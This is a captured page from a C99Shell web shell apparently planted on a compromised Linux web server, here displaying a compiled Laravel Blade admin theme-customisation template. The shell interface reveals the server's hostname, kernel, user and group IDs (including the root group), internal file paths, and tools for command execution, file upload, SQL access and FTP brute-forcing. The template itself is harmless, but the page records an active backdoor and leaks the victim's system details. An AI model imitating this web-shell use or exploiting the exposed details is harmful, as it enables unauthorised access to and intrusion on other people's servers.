!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html_v1_1/storage/framework/views/   drwxr-xr-x
Free 28.62 GB of 117.98 GB (24.25%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     7b228ddb4a42e4228fb2ca090f3d67a584f7b5e7.php (6.26 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php $__env->startSection('title',trans('admin.customize_theme')); ?>
<?php $__env
->startSection('extra-css'); ?>
    <style>
        .h-w-20{
            height: 20px;
            width: 20px;
        }
    </style>
<?php $__env->stopSection(); ?>
<?php $__env
->startSection('content'); ?>
    <?php $themeData=get_settings('theme_customize')?json_decode(get_settings('theme_customize')):''?>
    <section class="content">
        <div class="row">
            <div class="col-md-6 col-lg-6 col-sm-12 col-12 mx-auto">
                <div class="card mt-3">
                    <form method="post" role="form" id="planForm" action="<?php echo e(route('admin.theme.store')); ?>" enctype="multipart/form-data">
                        <?php echo csrf_field(); ?>
                        <div class="card-header">
                            <h4> <?php echo e(trans('admin.theme_customize')); ?></h4>
                        </div>
                        <div class="card-body p-4">
                            <div class="form-group">
                                <label for=""><?php echo e(trans('admin.skin')); ?></label>
                                <div class="form-group">
                                    <input id="light" <?php echo e(isset($themeData->type) && $themeData->type=='light'?'checked':''); ?> name="type" value="light" type="radio">
                                    <label for="light"><?php echo e(trans('admin.light')); ?></label>
                                    <input id="dark" name="type" <?php echo e(isset($themeData->type) && $themeData->type=='dark'?'checked':''); ?> value="dark" class="ml-3" type="radio">
                                    <label for="dark"><?php echo e(trans('admin.dark')); ?></label>
                                </div>
                            </div>
                            <div id="forLightV">
                                <div class="form-group">
                                    <label for=""> <?php echo e(trans('admin.navbar_color')); ?>

                                        <span class="ml-4" style="background: <?php echo e(isset($themeData->navbar_color)?$themeData->navbar_color:''); ?>; padding: 2px 16px"></span>
                                    </label>
                                    <input type="color" value="<?php echo e(isset($themeData->navbar_color)?$themeData->navbar_color:''); ?>" name="navbar_color" class="form-control">
                                </div>
                                <div class="form-group">
                                    <label for=""><?php echo e(trans('admin.left_sidebar_color')); ?>

                                        <span class="ml-4" style="background: <?php echo e(isset($themeData->left_sidebar)?$themeData->left_sidebar:''); ?>; padding: 2px 16px"></span>
                                    </label>
                                    <input type="color" value="<?php echo e(isset($themeData->left_sidebar)?$themeData->left_sidebar:''); ?>" name="left_sidebar" class="form-control">
                                </div>
                                <div class="form-group">
                                    <label for=""><?php echo e(trans('admin.active_sidebar_color')); ?>

                                        <span class="ml-4" style="background: <?php echo e(isset($themeData->active_sidebar)?$themeData->active_sidebar:''); ?>; padding: 2px 16px"></span>
                                    </label>
                                    <input type="color" value="<?php echo e(isset($themeData->active_sidebar)?$themeData->active_sidebar:''); ?>" name="active_sidebar" class="form-control">
                                </div>
                            </div>
                            <div class="form-group">
                                <input type="checkbox" id="clSideBard" value="true" <?php echo e(isset($themeData->collapse_sidebar) && $themeData->collapse_sidebar=='true'?'checked':''); ?> name="collapse_sidebar">
                                <label class="ml-2" for="clSideBard"><?php echo e(trans('admin.collapse_sidebar')); ?></label>
                            </div>

                        </div>
                        <!-- /.card-body -->
                        <div class="card-footer">
                            <button type="submit" class="btn btn-primary"><?php echo app('translator')->get('admin.form.button.submit'); ?></button>
                        </div>
                    </form>
                </div>

            </div>
            <!-- /.card -->
        </div>
        <!-- /.row -->
    </section>
    <!-- /.content -->
<?php $__env->stopSection(); ?>

<?php $__env->startSection('extra-scripts'); ?>
    <script>
        $(document).on('click', 'input[name=type]', function (e){
            const type = $(this).val();
            if(type=='dark'){
                $('html').attr('theme', 'dark-mode')
                $('#forLightV').addClass('d-none')
            }else{
                $('html').attr('theme', 'light-mode')
                $('#forLightV').removeClass('d-none')
            }
        });
        $(document).on('click', 'input[name=collapse_sidebar]', function (e){
            const check_type = $('input[name=collapse_sidebar]:checked').val();
            if(check_type) {
                $('body').addClass('collapse_sidebar')
            }else{
                $('body').removeClass('collapse_sidebar')
            }
            $('.fa-bars').trigger('click');
        });
        $(document).on('change', 'input[name=navbar_color]', function (e){
            const color = $(this).val();
            $('.main-header').css('background', color);
        });
        $(document).on('change', 'input[name=left_sidebar]', function (e){
            const color = $(this).val();
            $('.main-sidebar').css('background', color);
        });
        $(document).on('change', 'input[name=active_sidebar]', function (e){
            const color = $(this).val();
            $('.nav-link.active').css('background-color', color);
        });
    </script>
<?php $__env->stopSection(); ?>

<?php echo $__env->make('layouts.admin'\Illuminate\Support\Arr::except(get_defined_vars(), ['__data''__path']))->render(); ?><?php /**PATH /home/picotech/domains/smm.picotech.app/public_html/resources/views/admin/theme/index.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0047 ]--